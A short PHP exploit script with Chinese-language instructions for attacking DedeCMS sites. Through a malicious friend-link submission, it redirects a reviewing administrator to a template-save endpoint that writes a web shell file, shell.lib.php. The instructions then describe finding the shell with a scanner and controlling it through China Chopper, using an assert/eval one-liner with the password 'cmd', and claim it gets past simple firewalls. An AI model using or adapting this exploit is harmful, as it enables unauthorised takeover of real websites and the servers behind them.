1.php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = ''.'';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
把1.php上传到你的空间域名
站长审核后台友情连接 后生成一句话地址为http://hack1990.com//include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php测试是否存活即可
最后菜刀访问传参一句话http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd
过简单防火墙